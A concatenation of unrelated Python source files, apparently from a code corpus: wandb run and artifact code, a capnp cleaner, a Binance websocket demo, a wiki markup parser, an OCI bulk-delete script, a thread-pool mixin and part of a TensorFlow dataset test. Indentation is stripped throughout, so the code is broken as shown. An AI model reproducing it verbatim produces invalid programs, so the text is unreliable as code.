artifact, aliases = self._prepare_artifact(
artifact_or_path, name, type, aliases
)
artifact.distributed_id = distributed_id
self._assert_can_log_artifact(artifact)
if self._backend:
if not self._settings._offline:
future = self._backend.interface.communicate_artifact(
self,
artifact,
aliases,
finalize=finalize,
is_user_created=is_user_created,
use_after_commit=use_after_commit,
)
artifact._logged_artifact = _LazyArtifact(self._public_api(), future)
else:
self._backend.interface.publish_artifact(
self,
artifact,
aliases,
finalize=finalize,
is_user_created=is_user_created,
use_after_commit=use_after_commit,
)
return artifact
def _public_api(self):
overrides = {"run": self.id}
run_obj = self._run_obj
if run_obj is not None:
overrides["entity"] = run_obj.entity
overrides["project"] = run_obj.project
return public.Api(overrides)
# TODO(jhr): annotate this
def _assert_can_log_artifact(self, artifact): # type: ignore
if not self._settings._offline:
try:
public_api = self._public_api()
expected_type = public.Artifact.expected_type(
public_api.client,
artifact.name,
public_api.settings["entity"],
public_api.settings["project"],
)
except requests.exceptions.RequestException:
# Just return early if there is a network error. This is
# ok, as this function is intended to help catch an invalid
# type early, but not a hard requirement for valid operation.
return
if expected_type is not None and artifact.type != expected_type:
raise ValueError(
"Expected artifact type {}, got {}".format(
expected_type, artifact.type
)
)
def _prepare_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
):
aliases = aliases or ["latest"]
if isinstance(artifact_or_path, str):
if name is None:
name = "run-%s-%s" % (self.id, os.path.basename(artifact_or_path))
artifact = wandb.Artifact(name, type)
if os.path.isfile(artifact_or_path):
artifact.add_file(artifact_or_path)
elif os.path.isdir(artifact_or_path):
artifact.add_dir(artifact_or_path)
elif "://" in artifact_or_path:
artifact.add_reference(artifact_or_path)
else:
raise ValueError(
"path must be a file, directory or external"
"reference like s3://bucket/path"
)
else:
artifact = artifact_or_path
if not isinstance(artifact, wandb.Artifact):
raise ValueError(
"You must pass an instance of wandb.Artifact or a "
"valid file path to log_artifact"
)
if isinstance(aliases, str):
aliases = [aliases]
artifact.finalize()
return artifact, aliases
def alert(
self,
title,
text,
level = None,
wait_duration = None,
):
"""Launch an alert with the given title and text.
Arguments:
title: (str) The title of the alert, must be less than 64 characters long.
text: (str) The text body of the alert.
level: (str or wandb.AlertLevel, optional) The alert level to use, either: `INFO`, `WARN`, or `ERROR`.
wait_duration: (int, float, or timedelta, optional) The time to wait (in seconds) before sending another
alert with this title.
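Example:
A minimal sketch (the metric value and threshold are placeholders):
```python
import wandb

run = wandb.init()
accuracy = 0.32  # hypothetical metric value
if accuracy < 0.4:
    run.alert(
        title="Low accuracy",
        text="Accuracy {} is below the acceptable threshold".format(accuracy),
        level=wandb.AlertLevel.WARN,
        wait_duration=300,  # seconds to wait before sending another alert
    )
```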
"""
level = level or wandb.AlertLevel.INFO
if isinstance(level, wandb.AlertLevel):
level = level.value
if level not in (
wandb.AlertLevel.INFO.value,
wandb.AlertLevel.WARN.value,
wandb.AlertLevel.ERROR.value,
):
raise ValueError("level must be one of 'INFO', 'WARN', or 'ERROR'")
wait_duration = wait_duration or timedelta(minutes=1)
if isinstance(wait_duration, int) or isinstance(wait_duration, float):
wait_duration = timedelta(seconds=wait_duration)
elif not callable(getattr(wait_duration, "total_seconds", None)):
raise ValueError(
"wait_duration must be an int, float, or datetime.timedelta"
)
wait_duration = int(wait_duration.total_seconds() * 1000)
if self._backend:
self._backend.interface.publish_alert(title, text, level, wait_duration)
def __enter__(self):
return self
def __exit__(
self,
exc_type,
exc_val,
exc_tb,
):
exit_code = 0 if exc_type is None else 1
self.finish(exit_code)
return exc_type is None
def mark_preempting(self):
"""Mark this run as preempting and tell the internal process
to immediately report this to the server."""
if self._backend:
self._backend.interface.publish_preempting()
# We define this outside of the run context to support restoring before init
def restore(
name,
run_path = None,
replace = False,
root = None,
):
""" Downloads the specified file from cloud storage into the current directory
or run directory. By default this will only download the file if it doesn't
already exist.
Arguments:
name: the name of the file
run_path: optional path to a run to pull files from, i.e. `username/project_name/run_id`
if wandb.init has not been called, this is required.
replace: whether to download the file even if it already exists locally
root: the directory to download the file to. Defaults to the current
directory or the run directory if wandb.init was called.
Returns:
None if it can't find the file, otherwise a file object open for reading
Raises:
wandb.CommError: if we can't connect to the wandb backend
ValueError: if the file is not found or can't find run_path
"""
is_disabled = wandb.run is not None and wandb.run.disabled
run = None if is_disabled else wandb.run
if run_path is None:
if run is not None:
run_path = run.path
else:
raise ValueError(
"run_path required when calling wandb.restore before wandb.init"
)
if root is None:
if run is not None:
root = run.dir
api = public.Api()
api_run = api.run(run_path)
if root is None:
root = os.getcwd()
path = os.path.join(root, name)
if os.path.exists(path) and replace is False:
return open(path, "r")
if is_disabled:
return None
files = api_run.files([name])
if len(files) == 0:
return None
# if the file does not exist, the file has an md5 of 0
if files[0].md5 == "0":
raise ValueError("File {} not found in {}.".format(name, run_path or root))
return files[0].download(root=root, replace=True)
# propagate our doc string to the runs restore method
try:
Run.restore.__doc__ = restore.__doc__
# py2 doesn't let us set a doc string, just pass
except AttributeError:
pass
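# Usage sketch (illustrative, not part of the original module): restoring a file
# logged by a previous run. The run path below is an assumption for the example.
#
#     import wandb
#     weights_file = wandb.restore("model.h5", run_path="my-entity/my-project/a1b2c3d4")
#     if weights_file is not None:
#         print(weights_file.name)  # local path of the downloaded file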
def finish(exit_code = None):
"""
Marks a run as finished, and finishes uploading all data.
This is used when creating multiple runs in the same process.
We automatically call this method when your script exits.
"""
if wandb.run:
wandb.run.finish(exit_code=exit_code)
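# Usage sketch (illustrative, not part of the original module): creating several
# runs in one process and finishing each one explicitly, as the docstring above
# describes. Project and config values are assumptions for the example.
#
#     import wandb
#     for lr in (0.1, 0.01):
#         run = wandb.init(project="sweep-demo", config={"lr": lr}, reinit=True)
#         run.log({"loss": 1.0 / lr})
#         run.finish()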
class _LazyArtifact(ArtifactInterface):
# _api: PublicApi
_instance = None
# _future: Any
def __init__(self, api, future):
self._api = api
self._future = future
def _assert_instance(self):
if not self._instance:
raise ValueError(
"Must call wait() before accessing logged artifact properties"
)
return self._instance
def __getattr__(self, item):
self._assert_instance()
return getattr(self._instance, item)
def wait(self):
if not self._instance:
resp = self._future.get().response.log_artifact_response
if resp.error_message:
raise ValueError(resp.error_message)
self._instance = public.Artifact.from_id(resp.artifact_id, self._api.client)
assert isinstance(
self._instance, ArtifactInterface
), "Insufficient permissions to fetch Artifact with id {} from {}".format(
resp.artifact_id, self._api.client.app_url()
)
return self._instance
@property
def id(self):
return self._assert_instance().id
@property
def version(self):
return self._assert_instance().version
@property
def name(self):
return self._assert_instance().name
@property
def type(self):
return self._assert_instance().type
@property
def entity(self):
return self._assert_instance().entity
@property
def project(self):
return self._assert_instance().project
@property
def manifest(self):
return self._assert_instance().manifest
@property
def digest(self):
return self._assert_instance().digest
@property
def state(self):
return self._assert_instance().state
@property
def size(self):
return self._assert_instance().size
@property
def commit_hash(self):
return self._assert_instance().commit_hash
@property
def description(self):
return self._assert_instance().description
@description.setter
def description(self, desc):
self._assert_instance().description = desc
@property
def metadata(self):
return self._assert_instance().metadata
@metadata.setter
def metadata(self, metadata):
self._assert_instance().metadata = metadata
@property
def aliases(self):
return self._assert_instance().aliases
@aliases.setter
def aliases(self, aliases):
self._assert_instance().aliases = aliases
def used_by(self):
return self._assert_instance().used_by()
def logged_by(self):
return self._assert_instance().logged_by()
    # Commenting this block out since this code is unreachable (LocalArtifact
    # overrides these methods) and is therefore untestable.
    # Leaving it behind as we may want to support these in the future.
# def new_file(self, name: str, mode: str = "w") -> Any: # TODO: Refine Type
# return self._assert_instance().new_file(name, mode)
# def add_file(
# self,
# local_path: str,
# name: Optional[str] = None,
# is_tmp: Optional[bool] = False,
# ) -> Any: # TODO: Refine Type
# return self._assert_instance().add_file(local_path, name, is_tmp)
# def add_dir(self, local_path: str, name: Optional[str] = None) -> None:
# return self._assert_instance().add_dir(local_path, name)
# def add_reference(
# self,
# uri: Union["ArtifactEntry", str],
# name: Optional[str] = None,
# checksum: bool = True,
# max_objects: Optional[int] = None,
# ) -> Any: # TODO: Refine Type
# return self._assert_instance().add_reference(uri, name, checksum, max_objects)
# def add(self, obj: "WBValue", name: str) -> Any: # TODO: Refine Type
# return self._assert_instance().add(obj, name)
def get_path(self, name):
return self._assert_instance().get_path(name)
def get(self, name):
return self._assert_instance().get(name)
def download(self, root = None, recursive = False):
return self._assert_instance().download(root, recursive)
def checkout(self, root = None):
return self._assert_instance().checkout(root)
def verify(self, root = None):
return self._assert_instance().verify(root)
def save(self):
return self._assert_instance().save()
def delete(self):
return self._assert_instance().delete()
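# Usage sketch (illustrative, not part of the original module): a logged artifact
# is returned as a lazy handle, so wait() must be called before reading
# properties such as `version` or `aliases`. Names below are assumptions.
#
#     art = wandb.Artifact("model-weights", type="model")
#     art.add_file("weights.h5")
#     logged = run.log_artifact(art)
#     logged.wait()              # blocks until the backend responds
#     print(logged.version)      # safe only after wait()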
|
clean.py
|
#!/usr/bin/env python3
"""
Clean each capnp recording of any unfinished writes, since reading a truncated message would otherwise crash.
"""
import argparse
from multiprocessing import Process
from pathlib import Path
from shutil import copyfile
import derp.util
def clean(topic, path, tmp_path):
""" Cleaning is simply the act of writing only complete messages """
copyfile(path, tmp_path)
with open(tmp_path, 'rb') as topic_reader, open(path, 'wb') as topic_writer:
for msg in derp.util.TOPICS[topic].read_multiple(topic_reader):
msg.as_builder().write(topic_writer)
topic_writer.flush()
def main():
""" Create a process for each cleaning """
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("path", type=Path, help="location of a recording")
args = parser.parse_args()
for topic in derp.util.TOPICS:
path = args.path / (topic + '.bin')
tmp_path = args.path / (topic + '.bin.bak')
if path.exists():
proc = Process(target=clean, name=topic, args=(topic, path, tmp_path))
proc.start()
proc.join()
tmp_path.unlink()
if __name__ == "__main__":
main()
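# Example invocation (illustrative; the recording path is an assumption):
#
#     python3 clean.py /path/to/recording
#
# Each <topic>.bin file in the recording directory is rewritten in place with
# only its complete messages, using a temporary .bin.bak copy as the source.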
|
dev_stream_everything_and_unicorn_fy.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: dev_stream_everything_and_unicorn_fy.py
#
# Part of ‘UnicornFy’
# Project website: https://github.com/oliver-zehentleitner/unicorn-fy
# Documentation: https://oliver-zehentleitner.github.io/unicorn-fy
# PyPI: https://pypi.org/project/unicorn-fy
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2021, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
from unicorn_fy.unicorn_fy import UnicornFy
import logging
import os
import requests
import sys
import time
import threading
try:
from binance.client import Client
except ImportError:
print("Please install `python-binance`!")
sys.exit(1)
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is not False:
unicorn_fied_data = UnicornFy.binance_com_websocket(oldest_stream_data_from_stream_buffer)
print(str(unicorn_fied_data))
else:
time.sleep(0.01)
binance_api_key = ""
binance_api_secret = ""
channels = {'aggTrade', 'trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_2h', 'kline_4h',
'kline_6h', 'kline_8h', 'kline_12h', 'kline_1d', 'kline_3d', 'kline_1w', 'kline_1M', 'miniTicker',
'ticker', 'bookTicker', 'depth5', 'depth10', 'depth20', 'depth', 'depth@100ms'}
arr_channels = {'!miniTicker', '!ticker', '!bookTicker'}
markets = []
try:
binance_rest_client = Client(binance_api_key, binance_api_secret)
binance_websocket_api_manager = BinanceWebSocketApiManager()
except requests.exceptions.ConnectionError:
print("No internet connection?")
sys.exit(1)
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
data = binance_rest_client.get_all_tickers()
for item in data:
markets.append(item['symbol'])
binance_websocket_api_manager.set_private_api_config(binance_api_key, binance_api_secret)
userdata_stream_id = binance_websocket_api_manager.create_stream(["!userData"], ["arr"])
arr_stream_id = binance_websocket_api_manager.create_stream(arr_channels, "arr")
for channel in channels:
binance_websocket_api_manager.create_stream(channel, markets, stream_label=channel)
stream_id_trade = binance_websocket_api_manager.get_stream_id_by_label("trade")
binance_websocket_api_manager.get_stream_subscriptions(stream_id_trade)
#while True:
# binance_websocket_api_manager.print_summary()
# time.sleep(1)
|
mark.py
|
from set_mark.namu import namu
import re
import html
import sqlite3
import urllib.parse
import threading
import multiprocessing
def load_conn2(data):
global conn
global curs
conn = data
curs = conn.cursor()
def send_parser(data):
if not re.search('^<br>$', data):
data = html.escape(data)
javascript = re.compile('javascript:', re.I)
data = javascript.sub('', data)
while 1:
re_data = re.search('<a(?: (?:(?:(?!>).)*))?>(?P<in>(?:(?!<).)*)<\/a>', data)
if re_data:
re_data = re_data.groups()[0]
data = re.sub('<a(?: (?:(?:(?!>).)*))?>(?P<in>(?:(?!<).)*)<\/a>', '<a href="/w/' + urllib.parse.quote(re_data).replace('/','%2F') + '">' + re_data + '</a>', data, 1)
else:
break
return data
def plusing(data):
for data_in in data:
curs.execute("select title from back where title = ? and link = ? and type = ?", [data_in[1], data_in[0], data_in[2]])
if not curs.fetchall():
curs.execute("insert into back (title, link, type) values (?, ?, ?)", [data_in[1], data_in[0], data_in[2]])
def namumark(title = '', data = None, num = 0):
    if data is not None:
curs.execute('select data from other where name = "markup"')
rep_data = curs.fetchall()
if rep_data[0][0] == 'namumark':
data = namu(conn, data, title, num)
else:
data = ['', '', []]
if num == 1:
data_num = len(data[2])
data_in_num = int(data_num / 8)
data_in = []
for i in range(8):
if not i == 7:
data_in += [data[2][data_in_num * i:data_in_num * (i + 1)]]
else:
data_in += [data[2][data_in_num * i:]]
for data_in_for in data_in:
thread_start = threading.Thread(target = plusing, args = [data_in_for])
thread_start.start()
thread_start.join()
conn.commit()
return data[0] + data[1]
else:
return 'http request 404'
|
object_storage_bulk_delete.py
|
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
##########################################################################
# object_storage_bulk_delete.py
#
# @author: Adi Zohar
#
# Supports Python 3
#
# DISCLAIMER - This is not an official Oracle application, it is not supported by Oracle Support, and it should NOT be used for utilization calculation purposes
##########################################################################
# Info:
# Bulk delete with parallel threads
#
##########################################################################
# Application Command line parameters
#
# -c config - Config file section to use (tenancy profile)
# -t profile - Profile in config file, DEFAULT as default
# -p proxy - Set Proxy (i.e. www-proxy-server.com:80)
# -ip - Use Instance Principals for Authentication
# -dt - Use Instance Principals with delegation token for cloud shell
# -sb source_bucket
# -sp source_prefix
# -sr source_region
##########################################################################
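# Example invocation (illustrative; bucket, prefix and profile names are assumptions):
#
#     python3 object_storage_bulk_delete.py -t DEFAULT -sb my-bucket -sp logs/2021/
#
# The script lists matching objects, queues them, and deletes them with the
# parallel worker threads defined below.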
import threading
import time
import queue
import oci
import argparse
import datetime
import sys
import click
import os
##########################################################################
# Pre Main
##########################################################################
# Get Command Line Parser
parser = argparse.ArgumentParser()
parser.add_argument('-t', default="", dest='config_profile', help='Config file section to use (tenancy profile)')
parser.add_argument('-p', default="", dest='proxy', help='Set Proxy (i.e. www-proxy-server.com:80) ')
parser.add_argument('-ip', action='store_true', default=False, dest='is_instance_principals', help='Use Instance Principals for Authentication')
parser.add_argument('-dt', action='store_true', default=False, dest='is_delegation_token', help='Use Delegation Token for Authentication')
parser.add_argument('-c', default="", dest='config_file', help="Config File (default=~/.oci/config)")
parser.add_argument('-sb', default="", dest='source_bucket', help='Source Bucket Name')
parser.add_argument('-sp', default="", dest='source_prefix', help='Source Prefix Include')
parser.add_argument('-se', default="", dest='source_prefix_exclude', help='Source Prefix Exclude')
parser.add_argument('-exclude_dirs', action='store_true', default=False, dest='source_exclude_dirs', help='Exclude Directories')
parser.add_argument('-sr', default="", dest='source_region', help='Source Region')
cmd = parser.parse_args()
if len(sys.argv) < 2:
parser.print_help()
raise SystemExit
if not cmd.source_bucket:
print("Source bucket parameter is required !!!\n")
parser.print_help()
raise SystemExit
source_bucket = cmd.source_bucket
source_prefix = cmd.source_prefix
# Parameters
worker_count = 40
status_interval = 60
base_retry_timeout = 2
max_retry_timeout = 16**2
# global queue
q = queue.Queue()
# Global Variables
object_storage_client = None
source_namespace = ""
source_bucket = cmd.source_bucket
source_prefix = cmd.source_prefix
source_prefix_exclude = cmd.source_prefix_exclude
source_region = cmd.source_region
source_exclude_dirs = cmd.source_exclude_dirs
# Update Variables based on the parameters
config_file = (cmd.config_file if cmd.config_file else oci.config.DEFAULT_LOCATION)
config_profile = (cmd.config_profile if cmd.config_profile else oci.config.DEFAULT_PROFILE)
##########################################################################
# Create signer for Authentication
# Input - config_file, config_profile and is_instance_principals and is_delegation_token
# Output - config and signer objects
##########################################################################
def create_signer(config_file, config_profile, is_instance_principals, is_delegation_token):
# if instance principals authentications
if is_instance_principals:
try:
signer = oci.auth.signers.InstancePrincipalsSecurityTokenSigner()
config = {'region': signer.region, 'tenancy': signer.tenancy_id}
return config, signer
except Exception:
print_header("Error obtaining instance principals certificate, aborting")
raise SystemExit
# -----------------------------
# Delegation Token
# -----------------------------
elif is_delegation_token:
try:
# check if env variables OCI_CONFIG_FILE, OCI_CONFIG_PROFILE exist and use them
env_config_file = os.environ.get('OCI_CONFIG_FILE')
env_config_section = os.environ.get('OCI_CONFIG_PROFILE')
# check if file exist
if env_config_file is None or env_config_section is None:
print("*** OCI_CONFIG_FILE and OCI_CONFIG_PROFILE env variables not found, abort. ***")
print("")
raise SystemExit
config = oci.config.from_file(env_config_file, env_config_section)
delegation_token_location = config["delegation_token_file"]
with open(delegation_token_location, 'r') as delegation_token_file:
delegation_token = delegation_token_file.read().strip()
# get signer from delegation token
signer = oci.auth.signers.InstancePrincipalsDelegationTokenSigner(delegation_token=delegation_token)
return config, signer
except KeyError:
print("* Key Error obtaining delegation_token_file")
raise SystemExit
except Exception:
raise
# -----------------------------
# config file authentication
# -----------------------------
else:
config = oci.config.from_file(
(config_file if config_file else oci.config.DEFAULT_LOCATION),
(config_profile if config_profile else oci.config.DEFAULT_PROFILE)
)
signer = oci.signer.Signer(
tenancy=config["tenancy"],
user=config["user"],
fingerprint=config["fingerprint"],
private_key_file_location=config.get("key_file"),
pass_phrase=oci.config.get_config_value_or_default(config, "pass_phrase"),
private_key_content=config.get("key_content")
)
return config, signer
##############################################################################
# get time
##############################################################################
def get_time(full=False):
if full:
return str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
else:
return str(datetime.datetime.now().strftime("%H:%M:%S"))
##########################################################################
# Print header centered
##########################################################################
def print_header(name):
chars = int(90)
print("")
print('#' * chars)
print("#" + name.center(chars - 2, " ") + "#")
print('#' * chars)
##########################################################################
# Print Info
##########################################################################
def print_command_info():
print_header("Running Object Storage Bulk Delete")
print("Written by Adi Zohar, July 2020")
print("Starts at : " + get_time(full=True))
print("Command Line : " + ' '.join(x for x in sys.argv[1:]))
print("Source Namespace : " + source_namespace)
print("Source Bucket : " + source_bucket)
print("Source Prefix Include : " + source_prefix)
print("Source Prefix Exclude : " + source_prefix_exclude)
print("Source Region : " + source_region)
if source_exclude_dirs:
print("Source Exclude Dirs : True")
##############################################################################
# Worker
##############################################################################
def worker():
while True:
object_ = q.get()
interval_exp = base_retry_timeout
while True:
response = None
try:
response = object_storage_client.delete_object(source_namespace, source_bucket, object_)
break
except Exception as e:
if e.status == 400:
break
if interval_exp > max_retry_timeout:
print(" ERROR: Failed to request delete of %s" % (object_))
raise
if response:
print(" Received %s from API for object %s, will wait %s seconds before retrying." % (response.status, object_, interval_exp))
else:
print(" Received error from API for object %s, will wait %s seconds before retrying." % (object_, interval_exp))
time.sleep(interval_exp)
interval_exp **= 2
continue
q.task_done()
##############################################################################
# Add object to Q
##############################################################################
def add_objects_to_queue(ns, source_bucket):
global q
count = 0
next_starts_with = None
while True:
response = object_storage_client.list_objects(ns, source_bucket, start=next_starts_with, prefix=source_prefix, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
next_starts_with = response.data.next_start_with
for object_ in response.data.objects:
if source_prefix_exclude and object_.name.startswith(source_prefix_exclude):
continue
if source_exclude_dirs and "/" in object_.name:
continue
q.put(object_.name)
count += 1
if count % 100000 == 0:
print(get_time() + " - Added " + str(count) + " files to queue...")
if not next_starts_with:
break
return count
##############################################################################
# connect to object storage
##############################################################################
def connect_to_object_storage():
global source_namespace
global object_storage_client
global source_region
# get signer
config, signer = create_signer(cmd.config_file, cmd.config_profile, cmd.is_instance_principals, cmd.is_delegation_token)
# if region is specified
if source_region:
config['region'] = source_region
else:
source_region = config['region']
try:
# connect and fetch namespace
print("\nConnecting to Object Storage Service...")
object_storage_client = oci.object_storage.ObjectStorageClient(config, signer=signer)
if cmd.proxy:
object_storage_client.base_client.session.proxies = {'https': cmd.proxy}
# retrieve namespace from object storage
source_namespace = object_storage_client.get_namespace(retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
print("Succeed.")
except Exception as e:
print("\nError connecting to Object Storage - " + str(e))
raise SystemExit
##############################################################################
# Main
##############################################################################
def main():
# connect to object storage
connect_to_object_storage()
# command info
print_command_info()
if not click.confirm('\nAre you sure you want to continue deleting ?'):
raise SystemExit
print_header("Start Processing")
print(get_time() + " - Creating %s workers." % (worker_count))
for i in range(worker_count):
w = threading.Thread(target=worker)
w.daemon = True
w.start()
print(get_time() + " - Getting list of objects from source source_bucket (%s). delete will start immediately." % (source_bucket))
count = add_objects_to_queue(source_namespace, source_bucket)
print(get_time() + " - Enqueued %s objects to be deleted" % (count))
while count > 0:
print(get_time() + " - Waiting %s seconds before checking status." % (status_interval))
time.sleep(status_interval)
if q.qsize() == 0:
print(get_time() + " - deletion of all objects has been requested.")
break
else:
print(get_time() + " - %s object deletes remaining to requested." % (q.qsize()))
q.join()
print_header("Completed")
print("Completed at : " + get_time(True))
##############################################################################
# Execute
##############################################################################
if __name__ == '__main__':
main()
|
ThreadPoolMixIn.py
|
from socketserver import ThreadingMixIn
import threading
from queue import Queue, Empty
class ThreadPoolMixIn(ThreadingMixIn):
"""Mix-in class to handle requests in a thread pool.
    The pool grows and shrinks depending on load.
For instance, a threading UDP server class is created as follows:
    class ThreadPoolUDPServer(ThreadPoolMixIn, UDPServer):
pass
"""
def init_thread_pool(self, min_workers = 5,
max_workers = 200, min_spare_workers = 20):
"""Initialize thread pool."""
self.q = Queue()
self.min_workers = min_workers
self.max_workers = max_workers
self.min_spare_workers = min_spare_workers
self.num_workers = 0
self.num_busy_workers = 0
self.workers_mutex = threading.Lock()
self.start_workers(self.min_workers)
def start_workers(self, n):
"""Start n workers."""
for i in range(n):
t = threading.Thread(target = self.worker)
t.daemon = True
t.start()
def worker(self):
"""A function of a working thread.
It gets a request from queue (blocking if there
are no requests) and processes it.
After processing it checks how many spare workers
are there now and if this value is greater than
self.min_spare_workers then the worker exits.
Otherwise it loops infinitely.
"""
with self.workers_mutex:
self.num_workers += 1
while 1:
(request, client_address) = self.q.get()
with self.workers_mutex:
self.num_busy_workers += 1
self.process_request_thread(request, client_address)
self.q.task_done()
with self.workers_mutex:
self.num_busy_workers -= 1
if self.num_workers - self.num_busy_workers > \
self.min_spare_workers:
self.num_workers -= 1
return
def process_request(self, request, client_address):
"""Puts a request into queue.
        If the queue size is too large, it adds an extra worker.
"""
self.q.put((request, client_address))
with self.workers_mutex:
if self.q.qsize() > 3 and self.num_workers < self.max_workers:
self.start_workers(1)
def join(self):
"""Wait for all busy threads"""
self.q.join()
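# Usage sketch (not part of the original class): a minimal UDP echo server that
# combines ThreadPoolMixIn with socketserver.UDPServer, as suggested by the class
# docstring. Host, port and the echo handler are assumptions for the example.
if __name__ == "__main__":
    from socketserver import UDPServer, DatagramRequestHandler

    class EchoHandler(DatagramRequestHandler):
        def handle(self):
            # Echo the received datagram back to the sender.
            self.wfile.write(self.rfile.read())

    class ThreadPoolUDPServer(ThreadPoolMixIn, UDPServer):
        pass

    server = ThreadPoolUDPServer(("127.0.0.1", 9999), EchoHandler)
    server.init_thread_pool()  # must be called once before handling requests
    server.serve_forever()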
|
map_dataset_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import numpy as np
from tensorflow.contrib.data.python.ops import dataset_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class MapDatasetTest(test.TestCase):
def _buildMapDataset(self, components, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(count))
def testMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildMapDataset(components, count)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={count: 14})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={count: 18})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _buildParallelMapDataset(self, components, count, num_threads,
output_buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_threads=num_threads, output_buffer_size=output_buffer_size)
.repeat(count))
def testParallelMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
num_threads = array_ops.placeholder(dtypes.int32, shape=[])
output_buffer_size = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildParallelMapDataset(components, count, num_threads,
output_buffer_size)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
def do_test(num_threads_val, output_buffer_size_val):
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={
count: 14,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
